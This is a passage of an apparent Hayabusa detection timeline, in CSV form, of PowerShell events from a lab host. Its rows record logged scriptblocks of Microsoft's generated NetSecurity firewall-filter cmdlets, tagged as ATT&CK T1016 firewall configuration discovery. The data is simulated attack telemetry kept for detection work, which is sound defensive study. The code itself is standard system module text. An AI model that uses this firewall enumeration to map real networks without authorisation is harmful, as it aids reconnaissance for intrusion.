'Get-NetFirewallInterfaceFilter' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } 
catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 
+00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } 
} } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) 
{ $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceTypeFilter 
",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
